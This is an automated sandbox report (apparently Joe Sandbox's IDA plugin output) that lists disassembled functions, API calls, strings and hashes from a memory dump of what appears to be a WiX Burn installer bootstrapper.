Failed to post terminate message to child process cache thread., xrefs: 000D545A

Memory Dump Source

Source File: 00000000.00000002.1644155778.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000000.00000002.1644121649.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644204685.000000000010B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644230284.000000000012A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644257491.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c0000_24EPV9vjc5.jbxd

Similarity

API ID: ErrorLastObjectSingleWait
String ID: Failed to post terminate message to child process cache thread.$Failed to post terminate message to child process.$Failed to wait for child process exit.$Failed to write exit code to message buffer.$Failed to write restart to message buffer.$pipe.cpp
API String ID: 1211598281-2161881128
Opcode ID: e2a8b4c8ef036131fe82de8eb66ce3f349c8afe042d537bbae380a758c18cc77
Instruction ID: 8db7d9ef72c7a308d998c964a8c7ad3bdbcfc9d0c9db834c0b4ed2537f1f36eb
Opcode Fuzzy Hash: e2a8b4c8ef036131fe82de8eb66ce3f349c8afe042d537bbae380a758c18cc77
Instruction Fuzzy Hash: CD21D532940B2ABBCF225A549C05EEE7778AF00B6AF104223FD00B6290D771AD9096F1

Function 000D9098 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 89fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(00000000,80000000,00000005,00000000,00000003,08000000,00000000,00000000,00000101,?,000D9F04,00000003,000007D0,00000003,?,000007D0), ref: 000D90B2
GetLastError.KERNEL32(?,000D9F04,00000003,000007D0,00000003,?,000007D0,00000000,000007D0,00000000,00000003,00000000,00000003,000007D0,00000001,?), ref: 000D90BF
CloseHandle.KERNEL32(00000000,?,000D9F04,00000003,000007D0,00000003,?,000007D0,00000000,000007D0,00000000,00000003,00000000,00000003,000007D0,00000001), ref: 000D9187

Strings

Failed to verify hash of payload: %ls, xrefs: 000D9172
Failed to verify catalog signature of payload: %ls, xrefs: 000D914E
Failed to open payload at path: %ls, xrefs: 000D9103
cache.cpp, xrefs: 000D90F6
Failed to verify signature of payload: %ls, xrefs: 000D912F

Memory Dump Source

Source File: 00000000.00000002.1644155778.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000000.00000002.1644121649.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644204685.000000000010B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644230284.000000000012A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644257491.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c0000_24EPV9vjc5.jbxd

Similarity

API ID: CloseCreateErrorFileHandleLast
String ID: Failed to open payload at path: %ls$Failed to verify catalog signature of payload: %ls$Failed to verify hash of payload: %ls$Failed to verify signature of payload: %ls$cache.cpp
API String ID: 2528220319-2757871984
Opcode ID: 16a0547a78c2fc15c74d6b66ed0ff182680f687a7ce3cc354a232fddce8837fc
Instruction ID: 07f58ba1db906c80eaf114030d97f7956ff355399352de0cce19c5f2791ce6d5
Opcode Fuzzy Hash: 16a0547a78c2fc15c74d6b66ed0ff182680f687a7ce3cc354a232fddce8837fc
Instruction Fuzzy Hash: 5921E53A540727B7CB331AA48C4DF9E7B68AF00760F114323FD146679193729C61EAE1

Function 000C6B1E Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 88COMMON

Download Yara Rule

APIs

GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 000C6B69
GetLastError.KERNEL32 ref: 000C6B73
GetVolumePathNameW.KERNEL32(?,?,00000104), ref: 000C6BB7
GetLastError.KERNEL32 ref: 000C6BC1

Strings

Failed to get volume path name., xrefs: 000C6BEF
variable.cpp, xrefs: 000C6B97, 000C6BE5
Failed to get windows directory., xrefs: 000C6BA1
Failed to set variant value., xrefs: 000C6C0B

Memory Dump Source

Source File: 00000000.00000002.1644155778.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000000.00000002.1644121649.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644204685.000000000010B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644230284.000000000012A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644257491.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c0000_24EPV9vjc5.jbxd

Similarity

API ID: ErrorLast$DirectoryNamePathVolumeWindows
String ID: Failed to get volume path name.$Failed to get windows directory.$Failed to set variant value.$variable.cpp
API String ID: 124030351-4026719079
Opcode ID: 29f992a1d01239b582f51bd079b63a2cd2ba846097c9153423ae5ee4957b9ce6
Instruction ID: c9535774a0e6437e6c60f87464a66d087bc0b9b26a7402b8878c731c51aaf3df
Opcode Fuzzy Hash: 29f992a1d01239b582f51bd079b63a2cd2ba846097c9153423ae5ee4957b9ce6
Instruction Fuzzy Hash: 6D213873E4123967D730A7949D46FDF73AC9B00B10F014169BE44F7282EB75AE808AE5

Function 000C9C6D Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 82COMMON

Download Yara Rule

APIs

_MREFOpen@16.MSPDB140-MSVCRT ref: 000C9C88
GetFileAttributesW.KERNEL32(00000000,000002C0,?,00000000,00000000,000002C0,00000100,00000000,000002C0,?,000CA895,00000100,000002C0,000002C0,?,000002C0), ref: 000C9CA0
GetLastError.KERNEL32(?,000CA895,00000100,000002C0,000002C0,?,000002C0,00000100,000002C0,000002C0,00000100), ref: 000C9CAB

Strings

Failed get to file attributes. '%ls', xrefs: 000C9CE8
search.cpp, xrefs: 000C9CDB
File search: %ls, did not find path: %ls, xrefs: 000C9CFD
Failed to set variable., xrefs: 000C9D2B
Failed to format variable string., xrefs: 000C9C93

Memory Dump Source

Source File: 00000000.00000002.1644155778.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000000.00000002.1644121649.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644204685.000000000010B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644230284.000000000012A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644257491.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c0000_24EPV9vjc5.jbxd

Similarity

API ID: AttributesErrorFileLastOpen@16
String ID: Failed get to file attributes. '%ls'$Failed to format variable string.$Failed to set variable.$File search: %ls, did not find path: %ls$search.cpp
API String ID: 1811509786-2053429945
Opcode ID: d814c40b76f1cecc8af6a2f983e78455343015e4276ea8fdf6c9ff1ac111c6ce
Instruction ID: 7cb247d71b4e6f94355b6f33b8fe9befc4fae0963c25d0a3151c5006ca2606e0
Opcode Fuzzy Hash: d814c40b76f1cecc8af6a2f983e78455343015e4276ea8fdf6c9ff1ac111c6ce
Instruction Fuzzy Hash: 95213533940224BAEB221B949C8AFAEB6A8EF15761F200229FD55761E0D7B29D1096D1

Function 000DAD40 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 65COMMON

Download Yara Rule

APIs

TlsSetValue.KERNEL32(?,?), ref: 000DAD57
GetLastError.KERNEL32 ref: 000DAD61
CoInitializeEx.OLE32(00000000,00000000), ref: 000DADA0
CoUninitialize.OLE32(?,000DC721,?,?), ref: 000DADDD

Strings

Failed to set elevated cache pipe into thread local storage for logging., xrefs: 000DAD8F
elevation.cpp, xrefs: 000DAD85
Failed to initialize COM., xrefs: 000DADAC
Failed to pump messages in child process., xrefs: 000DADCB

Memory Dump Source

Source File: 00000000.00000002.1644155778.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000000.00000002.1644121649.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644204685.000000000010B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644230284.000000000012A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644257491.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c0000_24EPV9vjc5.jbxd

Similarity

API ID: ErrorInitializeLastUninitializeValue
String ID: Failed to initialize COM.$Failed to pump messages in child process.$Failed to set elevated cache pipe into thread local storage for logging.$elevation.cpp
API String ID: 876858697-113251691
Opcode ID: a6822bcc62ec41f03c325186dcd7b4d2e3dde2feec100035aaf469a52eb255e8
Instruction ID: 3e637ed83260059ce0552de58e2f715a6ea9f4d6a2cc4917cc5c9fbc70a706f6
Opcode Fuzzy Hash: a6822bcc62ec41f03c325186dcd7b4d2e3dde2feec100035aaf469a52eb255e8
Instruction Fuzzy Hash: 7B112372A49735BBC62217449C05D9FBAA8EF06B62B114117FD02B7750DBB09D4086F1

Function 000C5CE2 Relevance: 14.1, APIs: 1, Strings: 7, Instructions: 54registryCOMMON

Download Yara Rule

APIs

RegCloseKey.ADVAPI32(00000000,?,00000000,CommonFilesDir,?,80000002,SOFTWARE\Microsoft\Windows\CurrentVersion,00020119,00000000), ref: 000C5D68

Part of subcall function 001010B5: RegQueryValueExW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000002,00000001,00000000,00000000,00000000,00000000,00000000), ref: 0010112B
Part of subcall function 001010B5: RegQueryValueExW.ADVAPI32(?,00000000,00000000,?,00000000,00000000,00000000,?), ref: 00101163

Strings

SOFTWARE\Microsoft\Windows\CurrentVersion, xrefs: 000C5D05
CommonFilesDir, xrefs: 000C5CF0, 000C5D24, 000C5D33
Failed to read folder path for '%ls'., xrefs: 000C5D34
Failed to open Windows folder key., xrefs: 000C5D1A
ProgramFilesDir, xrefs: 000C5CF7
Failed to ensure path was backslash terminated., xrefs: 000C5D52
+, xrefs: 000C5CEA

Memory Dump Source

Source File: 00000000.00000002.1644155778.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000000.00000002.1644121649.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644204685.000000000010B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644230284.000000000012A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644257491.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c0000_24EPV9vjc5.jbxd

Similarity

API ID: QueryValue$Close
String ID: +$CommonFilesDir$Failed to ensure path was backslash terminated.$Failed to open Windows folder key.$Failed to read folder path for '%ls'.$ProgramFilesDir$SOFTWARE\Microsoft\Windows\CurrentVersion
API String ID: 1979452859-3209209246
Opcode ID: df4c9cf8d8457a6c0b036721acef229a27f7c921e3deb158ff5c9ee3c288046f
Instruction ID: 88d1062a9a130eee683d422cc2f532bb0d3534d96b1bb9ce16562ad90f038d81
Opcode Fuzzy Hash: df4c9cf8d8457a6c0b036721acef229a27f7c921e3deb158ff5c9ee3c288046f
Instruction Fuzzy Hash: EC014536A04628F7CB326794AC0AFAE7768DB14722F144219F841762A1D7F19E409280

Function 000EA271 Relevance: 12.4, APIs: 2, Strings: 5, Instructions: 174COMMON

Download Yara Rule

APIs

SetFileAttributesW.KERNEL32(?,00000000,?,00000000,?,?,?,?,00000000,00000000), ref: 000EA33E
GetLastError.KERNEL32(?,?,?,?,00000000,00000000), ref: 000EA348

Strings

download, xrefs: 000EA308
:, xrefs: 000EA3C1
Failed to clear readonly bit on payload destination path: %ls, xrefs: 000EA377
Failed attempt to download URL: '%ls' to: '%ls', xrefs: 000EA425
apply.cpp, xrefs: 000EA36C

Memory Dump Source

Source File: 00000000.00000002.1644155778.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000000.00000002.1644121649.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644204685.000000000010B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644230284.000000000012A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644257491.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c0000_24EPV9vjc5.jbxd

Similarity

API ID: AttributesErrorFileLast
String ID: :$Failed attempt to download URL: '%ls' to: '%ls'$Failed to clear readonly bit on payload destination path: %ls$apply.cpp$download
API String ID: 1799206407-1905830404
Opcode ID: ac6dad49496857c5c94fab3de8a135f36a2b6e9261caf8258b54520d7847e34a
Instruction ID: cd52866534a27edb2abef8b2c40381def6b61419198a23b622c8ec775f54cedd
Opcode Fuzzy Hash: ac6dad49496857c5c94fab3de8a135f36a2b6e9261caf8258b54520d7847e34a
Instruction Fuzzy Hash: BB519F75A00219AFDB11DFAAC881AAEB7F5FF59710F108059F904FB240E375EA40CB92

Function 00106EFF Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 159COMMON

Download Yara Rule

APIs

CompareStringW.KERNEL32(0000007F,00000000,774CDFD0,000000FF,type,000000FF,?,774CDFD0,774CDFD0,774CDFD0), ref: 00106F55
SysFreeString.OLEAUT32(00000000), ref: 00106FA0
SysFreeString.OLEAUT32(00000000), ref: 0010701C
SysFreeString.OLEAUT32(00000000), ref: 00107068

Strings

type, xrefs: 00106F47
url, xrefs: 00106F68

Memory Dump Source

Source File: 00000000.00000002.1644155778.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000000.00000002.1644121649.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644204685.000000000010B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644230284.000000000012A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644257491.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c0000_24EPV9vjc5.jbxd

Similarity

API ID: String$Free$Compare
String ID: type$url
API String ID: 1324494773-1247773906
Opcode ID: c655657c12e99c4a3b2d90d068785d0a191429c7ea380a449c0c836b02275e37
Instruction ID: 52f6915687f28d6b107e5e378d8db2f0317da43b019485de6bbfe753e763d87e
Opcode Fuzzy Hash: c655657c12e99c4a3b2d90d068785d0a191429c7ea380a449c0c836b02275e37
Instruction Fuzzy Hash: 82518D35D05219EFCB15DBA4C884EAEBBB8AF04710F204299F591EB2E4D7B1AE50DB50

Function 001084C7 Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 156COMMON

Download Yara Rule

APIs

Part of subcall function 000C394F: GetProcessHeap.KERNEL32(?,000001C7,?,000C2274,000001C7,00000001,80004005,8007139F,?,?,00100267,8007139F,?,00000000,00000000,8007139F), ref: 000C3960
Part of subcall function 000C394F: RtlAllocateHeap.NTDLL(00000000,?,000C2274,000001C7,00000001,80004005,8007139F,?,?,00100267,8007139F,?,00000000,00000000,8007139F), ref: 000C3967

CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,http://appsyndication.org/2006/appsyn,000000FF,00000010,00000001,00000000,00000000,00000410,?,?,000E9063,000002C0,00000100), ref: 001084F5
CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,application,000000FF,?,?,000E9063,000002C0,00000100,000002C0,000002C0,00000100,000002C0,00000410), ref: 00108510

Strings

type, xrefs: 00108537
http://appsyndication.org/2006/appsyn, xrefs: 001084E8
apuputil.cpp, xrefs: 001085AB
application, xrefs: 00108502

Memory Dump Source

Source File: 00000000.00000002.1644155778.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000000.00000002.1644121649.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644204685.000000000010B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644230284.000000000012A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644257491.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c0000_24EPV9vjc5.jbxd

Similarity

API ID: CompareHeapString$AllocateProcess
String ID: application$apuputil.cpp$http://appsyndication.org/2006/appsyn$type
API String ID: 2664528157-4206478990
Opcode ID: 911cd3a21167466aafae33997e23c261427fe8f2b8e07ac4c1066231e903585c
Instruction ID: ca38edf6ace5664cfa005a25b78bb088982ea4f89f2e7912d597c75d0739cf72
Opcode Fuzzy Hash: 911cd3a21167466aafae33997e23c261427fe8f2b8e07ac4c1066231e903585c
Instruction Fuzzy Hash: AF51A031648705AFDB209F54CC81F5A7BA5AF14720F218618FAE5EB2D2DBF1ED408B50

Function 001064B7 Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 154fileCOMMON

Download Yara Rule

APIs

GetLastError.KERNEL32 ref: 00106513
DeleteFileW.KERNEL32(00000410,00000000,00000000,?,?,00000078,000000FF,00000410,?,?,?,00000078,000000FF,?,?,00000078), ref: 0010660A
CloseHandle.KERNEL32(000000FF,00000000,00000000,?,?,00000078,000000FF,00000410,?,?,?,00000078,000000FF,?,?,00000078), ref: 00106619

Strings

WiX\Burn, xrefs: 00106551
DownloadTimeout, xrefs: 0010654C
Burn, xrefs: 00106502
dlutil.cpp, xrefs: 00106537

Memory Dump Source

Source File: 00000000.00000002.1644155778.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000000.00000002.1644121649.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644204685.000000000010B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644230284.000000000012A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644257491.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c0000_24EPV9vjc5.jbxd

Similarity

API ID: CloseDeleteErrorFileHandleLast
String ID: Burn$DownloadTimeout$WiX\Burn$dlutil.cpp
API String ID: 3522763407-1704223933
Opcode ID: e0b332dc435219129bf039029482a24d47183feff45abb06cb12df0852c7a7be
Instruction ID: 380fb385daa80a94b88c3ce5846b618989c30055bf594e9d49643cf57c728a0a
Opcode Fuzzy Hash: e0b332dc435219129bf039029482a24d47183feff45abb06cb12df0852c7a7be
Instruction Fuzzy Hash: 73511772D00229BBDF12DFA4CC45EEFBBB9EB08750F044165FA54E6190E7718A619BA0

Function 000C9EC7 Relevance: 12.4, APIs: 2, Strings: 5, Instructions: 147COMMON

Download Yara Rule

APIs

_MREFOpen@16.MSPDB140-MSVCRT ref: 000C9EED
_MREFOpen@16.MSPDB140-MSVCRT ref: 000C9F12

Strings

Failed to get component path: %d, xrefs: 000C9F76
MsiComponentSearch failed: ID '%ls', HRESULT 0x%x, xrefs: 000CA006
Failed to set variable., xrefs: 000C9FF6
Failed to format product code string., xrefs: 000C9F1D
Failed to format component id string., xrefs: 000C9EF8

Memory Dump Source

Source File: 00000000.00000002.1644155778.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000000.00000002.1644121649.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644204685.000000000010B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644230284.000000000012A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644257491.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c0000_24EPV9vjc5.jbxd

Similarity

API ID: Open@16
String ID: Failed to format component id string.$Failed to format product code string.$Failed to get component path: %d$Failed to set variable.$MsiComponentSearch failed: ID '%ls', HRESULT 0x%x
API String ID: 3613110473-1671347822
Opcode ID: ad7d5461cb391570dd04f00ae6022694ba0ebfa8ef9f3e4861b4deffa4833761
Instruction ID: 3646c39a5eb48d6a6eb4e23ed6d937f38bf9aadb17faedbeb1b9b4ba76736b53
Opcode Fuzzy Hash: ad7d5461cb391570dd04f00ae6022694ba0ebfa8ef9f3e4861b4deffa4833761
Instruction Fuzzy Hash: 6341E032900115BACF75ABA88C8AFBEB7E8EF05310F24862EF514E21D1D7719E41D791

Function 000CF812 Relevance: 12.4, APIs: 2, Strings: 5, Instructions: 117registryCOMMON

Download Yara Rule

APIs

RegCloseKey.ADVAPI32(?,?,?,00000001,?,?,?,00000001,00000000,?,00000000,?,?,?,00000000,?), ref: 000CF942
RegCloseKey.ADVAPI32(00000000,?,?,00000001,?,?,?,00000001,00000000,?,00000000,?,?,?,00000000,?), ref: 000CF94F

Strings

Resume, xrefs: 000CF8B6
Failed to read Resume value., xrefs: 000CF8D8
%ls.RebootRequired, xrefs: 000CF82F
Failed to format pending restart registry key to read., xrefs: 000CF846
Failed to open registration key., xrefs: 000CF8AB

Memory Dump Source

Source File: 00000000.00000002.1644155778.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000000.00000002.1644121649.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644204685.000000000010B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644230284.000000000012A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644257491.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c0000_24EPV9vjc5.jbxd

Similarity

API ID: Close
String ID: %ls.RebootRequired$Failed to format pending restart registry key to read.$Failed to open registration key.$Failed to read Resume value.$Resume
API String ID: 3535843008-3890505273
Opcode ID: 3f515168079497c9369f643d16e3346b45623ccff69c1c48e3fa0ebb252715a9
Instruction ID: 5e1dc3a70ccab1e79dfb4cc82f8d5f3bd57c4051cb4a0ef248fc05a79e2a517c
Opcode Fuzzy Hash: 3f515168079497c9369f643d16e3346b45623ccff69c1c48e3fa0ebb252715a9
Instruction Fuzzy Hash: B2412D7190015AFBDF229F98C881FBDBBB6EB04310F55817AE950A7260C7B29E45DB42

Function 000DAA00 Relevance: 12.4, APIs: 2, Strings: 5, Instructions: 111COMMON

Download Yara Rule

Strings

Failed to determine length of source path., xrefs: 000DAA30
Failed to trim source folder., xrefs: 000DAA95
Failed to set last source., xrefs: 000DAAF0
Failed to determine length of relative path., xrefs: 000DAA4D
WixBundleLastUsedSource, xrefs: 000DAA9F, 000DAAA5, 000DAAE1

Memory Dump Source

Source File: 00000000.00000002.1644155778.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000000.00000002.1644121649.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644204685.000000000010B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644230284.000000000012A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644257491.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c0000_24EPV9vjc5.jbxd

Similarity

API ID:
String ID: Failed to determine length of relative path.$Failed to determine length of source path.$Failed to set last source.$Failed to trim source folder.$WixBundleLastUsedSource
API String ID: 0-660234312
Opcode ID: 1e91e73f992c7e8ca0cde711699bd94d4071af87d6c6e940cf9faeeeac01adee
Instruction ID: 27c1b541771e9ba0dbf0e8772291299af9dbda10acc84b9535c0cc5e674cb4be
Opcode Fuzzy Hash: 1e91e73f992c7e8ca0cde711699bd94d4071af87d6c6e940cf9faeeeac01adee
Instruction Fuzzy Hash: F531A732A04219BFCF229A98CD45FDE7BBADB05720F114366F810B63D1D7719D41C6A2

Function 000ED8B0 Relevance: 12.4, APIs: 1, Strings: 6, Instructions: 106comCOMMON

Download Yara Rule

APIs

CoCreateInstance.OLE32(00120C4C,00000000,00000017,00120C5C,?,?,00000000,00000000,?,?,?,?,?,000EDEE7,00000000,00000000), ref: 000ED8E8

Strings

Failed to create BITS job., xrefs: 000ED922
Failed to set BITS job to foreground., xrefs: 000ED969
Failed to set notification flags for BITS job., xrefs: 000ED93A
Failed to set progress timeout., xrefs: 000ED952
Failed to create IBackgroundCopyManager., xrefs: 000ED8F4
WixBurn, xrefs: 000ED913

Memory Dump Source

Source File: 00000000.00000002.1644155778.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000000.00000002.1644121649.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644204685.000000000010B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644230284.000000000012A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644257491.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c0000_24EPV9vjc5.jbxd

Similarity

API ID: CreateInstance
String ID: Failed to create BITS job.$Failed to create IBackgroundCopyManager.$Failed to set BITS job to foreground.$Failed to set notification flags for BITS job.$Failed to set progress timeout.$WixBurn
API String ID: 542301482-468763447
Opcode ID: 29049e43d1fa4c38dcd043a17d2ff0a4bb853b9211f14b0929ee10e1ced8324f
Instruction ID: be78baf795a3241311e8928d2bd41b7f1c5c5ad611e2650dce192160c3240510
Opcode Fuzzy Hash: 29049e43d1fa4c38dcd043a17d2ff0a4bb853b9211f14b0929ee10e1ced8324f
Instruction Fuzzy Hash: 7631A271B4035AAFDB15DBAAD845E6FBBB4EF48710B10025AE901FB352CB31AC55CB90

Function 00105DAE Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 100fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(00000000,C0000000,00000004,00000000,00000004,00000080,00000000,00000000,?,?,?,?,?,WiX\Burn,DownloadTimeout,00000078), ref: 00105DF8
GetLastError.KERNEL32 ref: 00105E05
ReadFile.KERNEL32(00000000,00000008,00000008,?,00000000), ref: 00105E4C
GetLastError.KERNEL32 ref: 00105E80
CloseHandle.KERNEL32(00000000,dlutil.cpp,000000C8,00000000), ref: 00105EB4

Strings

%ls.R, xrefs: 00105DCC
dlutil.cpp, xrefs: 00105E29, 00105EA4

Memory Dump Source

Source File: 00000000.00000002.1644155778.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000000.00000002.1644121649.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644204685.000000000010B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644230284.000000000012A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644257491.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c0000_24EPV9vjc5.jbxd

Similarity

API ID: ErrorFileLast$CloseCreateHandleRead
String ID: %ls.R$dlutil.cpp
API String ID: 3160720760-657863730
Opcode ID: 985f66218cde946b35c50cce7a2b4d6c59bad65b9ddf70b1eabdb2125b684584
Instruction ID: 1ffc33206f2444a7a39170c85a7cdc49d2677d56b32daf48a467cf98062145bb
Opcode Fuzzy Hash: 985f66218cde946b35c50cce7a2b4d6c59bad65b9ddf70b1eabdb2125b684584
Instruction Fuzzy Hash: 0B31F872941625ABE7208B54CC45BAFBAB9EF05721F114219FED5EB2C1D7F09E008AE0

Function 000CC8E6 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 98fileCOMMON

Download Yara Rule

APIs

Part of subcall function 000CCD5E: CompareStringW.KERNEL32(0000007F,00000000,00000000,000000FF,000CE444,000000FF,00000000,00000000,000CE444,?,?,000CDBEB,?,?,?,?), ref: 000CCD89

CreateFileW.KERNEL32(E90010BA,80000000,00000005,00000000,00000003,08000000,00000000,000C53C5,?,00000000,840F01E8,14680A79,00000001,000C53BD,00000000,000C5489), ref: 000CC956
GetLastError.KERNEL32(?,?,?,000D7809,000C566D,000C5479,000C5479,00000000,?,000C5489,FFF9E89D,000C5489,000C54BD,000C5445,?,000C5445), ref: 000CC99B

Strings

catalog.cpp, xrefs: 000CC9BC
Failed to verify catalog signature: %ls, xrefs: 000CC994
Failed to get catalog local file path, xrefs: 000CC9D9
Failed to open catalog in working path: %ls, xrefs: 000CC9C9
Failed to find payload for catalog file., xrefs: 000CC9E0

Memory Dump Source

Source File: 00000000.00000002.1644155778.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000000.00000002.1644121649.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644204685.000000000010B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644230284.000000000012A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644257491.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File

